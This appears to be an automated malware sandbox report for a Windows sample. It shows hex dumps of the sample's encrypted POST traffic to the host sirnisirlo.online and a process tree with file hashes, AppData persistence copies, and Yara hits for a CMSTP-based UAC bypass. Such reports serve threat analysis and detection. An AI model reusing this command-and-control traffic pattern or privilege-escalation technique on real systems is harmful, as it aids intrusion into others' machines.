2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 3a 2e a7 33 33 b4 b1 b2 2e 98 1b 17 18 2e a7 ba 3a 36 b7 b7 b5 2e 28 39 b7 33 b4 36 b2 b9 2e a7 ba 3a 36 b7 b7 b5 2e 9c 99 9b 9a a1 23 23 18 1a 98 99 98 98 98 32 99 21 1c 1c a0 18 18 98 18 1a 21 19 a0 1b 1b 9b 1b 14 00 be 01 ba 0d 0a 00 19 1d 0e 1f 19 41 08 52 bf bf ba 0d 8a 08 23 72 9c 5a 99 86 38 b5 b1 b9 98 98 17 3a 3c 3a 14 00 02 03 7d 03 11 00 19 1d 0e 1f 19 41 08 08 bf bf 7d 03 8a 08 23 72 9c 5a 99 86 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 14 00 09 04 4b 00 07 00 19 1d 0e 1f 19 41 08 ec bf bf 4b 00 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 bd 04 6a 0d 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 6a 0d d0 f7 00 81 71 ef 0b ad 14 00 1a 0e 7f 0a 0a 00 19 1d 0e 1f 19 41 08 3b bf bf 7f 0a 8a 08 23 72 9c 5a 99 86 b1 b7 37 33 b4 b3 af b2 3c 3a Data Ascii: :.33..:6.(936.:6.##2!!AR#rZ8:<:}A}#rZ49199KAK#rZ)6+'jA;jqA;#rZ73<:
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 05 29 02 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 29 02 2d 18 97 ed 0c a0 82 d1 01 86 24 9b d2 d9 f3 20 10 00 30 0b 60 09 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 60 09 76 31 4a 94 d5 2d 41 b8 10 00 cc 0d e7 08 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 e7 08 e6 0d 49 2b 44 15 42 07 14 00 51 0c 3c 04 08 00 19 1d 0e 1f 19 41 08 a2 e3 e3 3c 04 81 dc 5b 0d 41 97 00 aa a8 42 e8 7b 9f ee 71 5b 10 00 fa 0d 82 0d 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 82 0d e1 58 2d 69 42 a1 d3 40 10 00 e1 02 e7 01 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 e7 01 8e c9 c4 57 2d 30 3a 7e 14 00 89 0d 35 0e 07 00 19 1d 0e 1f 19 41 08 ec bf bf 35 0e 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 22 0f 78 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 78 04 85 46 79 84 27 5e 72 a8 14 00 86 0a 11 0a 08 00 19 1d 0e Data Ascii: )A)-$ 0`A`v1J-AA;I+DBQ<A<[AB{q[AX-iB@AW-0:~5A5#rZ)6+'"xAxFy'^r
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 9c 99 99 18 1b 9a 98 9b 18 98 19 9b 98 9c 19 19 10 00 9a 04 91 06 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 91 06 4d 4d 0d c3 be 96 06 ef 14 00 f0 01 30 03 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 30 03 ce 18 c6 12 71 77 c6 fc e3 86 75 64 af 0e b7 0d 14 00 26 09 6d 06 12 00 19 1d 0e 1f 19 41 08 52 bf bf 6d 06 8a 08 23 72 9c 5a 99 86 33 b7 39 b6 34 b4 b9 3a b7 39 bc 17 b9 b8 36 b4 3a b2 14 00 be 04 62 0a 17 00 19 1d 0e 1f 19 41 08 a2 bf bf 62 0a 8a 08 23 72 9c 5a 99 86 33 b4 36 b2 af 3a 39 b0 37 b9 33 b2 39 af 3a 39 b0 b1 b2 17 3a 3c 3a 10 00 4f 08 f1 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 f1 04 f1 f9 20 4e 53 e1 2b 62 14 00 89 06 96 0c 08 00 19 1d 0e 1f 19 41 08 08 bf bf 96 0c 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 81 03 4b 0d 08 00 19 1d 0e 1f 19 41 Data Ascii: AMM0A0qwud&mARm#rZ394:96:bAb#rZ36:9739:9:<:OA NS+bA#rZ8936KA
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 8a 08 23 72 9c 5a 99 86 29 22 28 14 00 a7 03 fe 0a 08 00 19 1d 0e 1f 19 41 08 b7 e3 e3 fe 0a 75 87 45 c9 44 2e af a7 5d 19 f6 bf 9a 57 de 56 10 00 db 00 47 0c 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 47 0c 6e 8a c2 b3 cc 92 c9 9f 14 00 5e 06 0f 0f 07 00 19 1d 0e 1f 19 41 08 08 bf bf 0f 0f 8a 08 23 72 9c 5a 99 86 a1 aa 29 29 a2 27 2a 10 00 0d 0a c1 0b 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 c1 0b db e9 d6 61 79 f1 dd 4d 14 00 e5 05 86 0e 0e 00 19 1d 0e 1f 19 41 08 52 bf bf 86 0e 8a 08 23 72 9c 5a 99 86 b1 b7 b7 b5 b4 b2 b9 17 b9 b8 36 b4 3a b2 10 00 bb 02 54 0a 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 54 0a a0 98 92 48 03 84 99 64 14 00 e8 04 33 07 04 00 19 1d 0e 1f 19 41 08 08 bf bf 33 07 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 1d 0a 8c 06 06 00 19 1d 0e 1f 19 41 08 Data Ascii: #rZ)"(AuED.]WVGAGn^A#rZ))'*AayMAR#rZ6:TATHd3A3#rZ&A
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 2d 57 9a c3 96 07 8c ef 5b 89 e3 b2 67 14 00 38 00 e2 0b 08 00 19 1d 0e 1f 19 41 08 52 bf bf e2 0b 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 0d 0e 6a 0f 0b 00 19 1d 0e 1f 19 41 08 08 bf bf 6a 0f 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b0 3a b2 14 00 dd 01 f0 07 08 00 19 1d 0e 1f 19 41 08 ec e3 e3 f0 07 dd 40 13 8a 82 4d e7 2c f5 de a0 fc 5c 34 96 dd 14 00 76 0b f7 01 04 00 19 1d 0e 1f 19 41 08 08 bf bf f7 01 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 d9 09 f4 0d 23 00 19 1d 0e 1f 19 41 08 fb bf bf f4 0d 8a 08 23 72 9c 5a 99 86 32 b4 b9 b1 b7 39 32 b1 b0 37 b0 39 bc 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 14 00 58 05 34 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 34 01 38 64 e3 05 19 0e 28 b5 11 fa 50 73 c7 77 59 44 Data Ascii: -W[g8AR#rZ8936jAj#rZ&6::A@M,\4vA#rZ&#A#rZ29279.&6:9.6;621X4A48d(PswYD
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 00 19 1d 0e 1f 19 41 04 fb c4 c4 d2 0c 0b 84 52 59 a9 9c 59 75 10 00 85 01 56 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 56 0f cf 5d 1e a8 7c 62 15 84 14 00 32 0a 46 02 06 00 19 1d 0e 1f 19 41 08 9b bf bf 46 02 8a 08 23 72 9c 5a 99 86 a3 ba b0 39 32 b0 14 00 ad 04 b3 0a 05 00 19 1d 0e 1f 19 41 08 08 bf bf b3 0a 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 14 00 99 0f 69 04 05 00 19 1d 0e 1f 19 41 08 08 bf bf 69 04 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 10 00 64 0d 94 04 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 94 04 0a 4a 03 d6 b9 75 08 fa 14 00 36 0d 2d 08 0e 00 19 1d 0e 1f 19 41 08 b7 bf bf 2d 08 8a 08 23 72 9c 5a 99 86 36 b7 b3 b4 37 ba b9 b2 39 b9 17 3b 32 33 14 00 1b 0a 18 00 09 00 19 1d 0e 1f 19 41 08 3b bf bf 18 00 8a 08 23 72 9c 5a 99 86 28 39 b7 3a b7 37 2b 28 Data Ascii: ARYYuVAV]\|b2FAF#rZ92A#rZ621iAi#rZ621dAJu6-A-#rZ679;23A;#rZ(9:7+(
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 5a 99 86 a1 34 39 b7 b6 b2 14 00 96 03 70 07 0d 00 19 1d 0e 1f 19 41 08 cb bf bf 70 07 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 10 00 1e 03 12 0f 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 12 0f 20 5d ae 5c 83 a4 50 75 14 00 d5 09 a2 0e 08 00 19 1d 0e 1f 19 41 08 9b e3 e3 a2 0e 3e 89 04 ce 64 9d ac 84 16 17 b7 b8 ba e4 dd 75 14 00 72 0f bf 01 13 00 19 1d 0e 1f 19 41 08 ec bf bf bf 01 8a 08 23 72 9c 5a 99 86 38 b0 b9 b9 bb b7 39 32 b9 17 b2 37 b1 b6 b0 b9 3a b2 39 14 00 f0 0b 10 0a 2a 00 19 1d 0e 1f 19 41 08 cb bf bf 10 0a 8a 08 23 72 9c 5a 99 86 a7 ba 3a 36 b7 b7 b5 ab b4 37 a0 38 38 a1 36 b0 b9 b9 b4 b1 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 14 00 b2 0c 8d 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 8d 01 00 e4 f3 cb Data Ascii: Z49pAp#rZ&6:9A ]\PuA>durA#rZ8927:9*A#rZ:67886.88":.&6.:6A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49266	188.114.97.3	443	4836	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:46 UTC	449	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 53 Host: sirnisirlo.online
2024-11-14 18:57:46 UTC	53	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:57:46 UTC	733	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:57:46 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oDhLn1jL%2F6y3jT5Zyq%2BmyffTuz5B6wzXVWkE4JLeLVh8PXc%2BjqHwCt9UNPfLzx3G1xtaoEGEPLRsb62SZj3V5liEQ6lYD7R4%2BeJAcfsan3%2FPAraM5OTpGiyIes8nZSVxXL60Tw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293aa81ef42e27-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1138&delivery_rate=1477551&cwnd=251&unsent_bytes=0&cid=5ef26e219907a0dd&ts=419&x=0"
2024-11-14 18:57:46 UTC	84	IN	Data Raw: 34 65 0d 0a 00 00 00 00 00 00 00 00 3e 00 00 00 fe ff ff ff 91 9c ce 14 a1 ae 02 ce 0c 85 56 de ce 17 fd e1 44 ce 22 c7 31 38 ce 26 75 b6 d6 ce 03 d0 c6 1f ce 29 c4 8a b7 ce 22 7f cf 0c ce 02 03 ca 2b ce 04 73 90 21 ce 3e 9c 99 b4 ce 37 d1 d4 f3 0d 0a Data Ascii: 4e>VD"18&u)"+s!>7
2024-11-14 18:57:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49267	188.114.97.3	443	4836	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:47 UTC	449	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:57:47 UTC	35	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:57:48 UTC	717	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:47 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mk7vBrnjoYr7X8eCM80Fl%2BOnXEfBxHvkxDzyVP%2FMEcMjJGb%2FsidGfR3nO9E1gID%2BYJjYVL9%2BNtdM0%2BS3EC65rf8mo%2B%2FudvYnsp9MhTat6lZmsj4Ejr2wrtjm6foOVvTfw3Sp3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293ab0cfabc38a-SEA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=54204&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1120&delivery_rate=53404&cwnd=32&unsent_bytes=0&cid=831757e9334cfe06&ts=692&x=0"

Target ID:	6
Start time:	13:56:04
Start date:	14/11/2024
Path:	C:\Users\user\Desktop\TVr2Z822J3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TVr2Z822J3.exe"
Imagebase:	0x400000
File size:	11'140'776 bytes
MD5 hash:	467E95C9A46987552925C47BC7B38916
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	13:56:06
Start date:	14/11/2024
Path:	C:\Users\user\ActiveISO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\ActiveISO.exe"
Imagebase:	0xb0000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1338281133.000001AD62686000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	13:56:10
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
Imagebase:	0x7ff6b1fc0000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1419280539.000002B7CE788000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	11
Start time:	13:56:13
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	13:56:13
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	15:55:44
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	16
Start time:	15:55:58
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
Imagebase:	0x7ff6b1fc0000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1820736512.0000023BF5A88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	17
Start time:	15:55:59
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1889758659.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1890287986.0000000004D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	18
Start time:	15:55:59
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	22
Start time:	15:56:10
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe"
Imagebase:	0x7ff6b1fc0000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.1962021815.00000285613F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	25
Start time:	15:56:13
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2171548807.0000000005052000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	26
Start time:	15:56:13
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	15:56:31
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\UploadAlt_Ti.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2306254351.00000000026AF000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true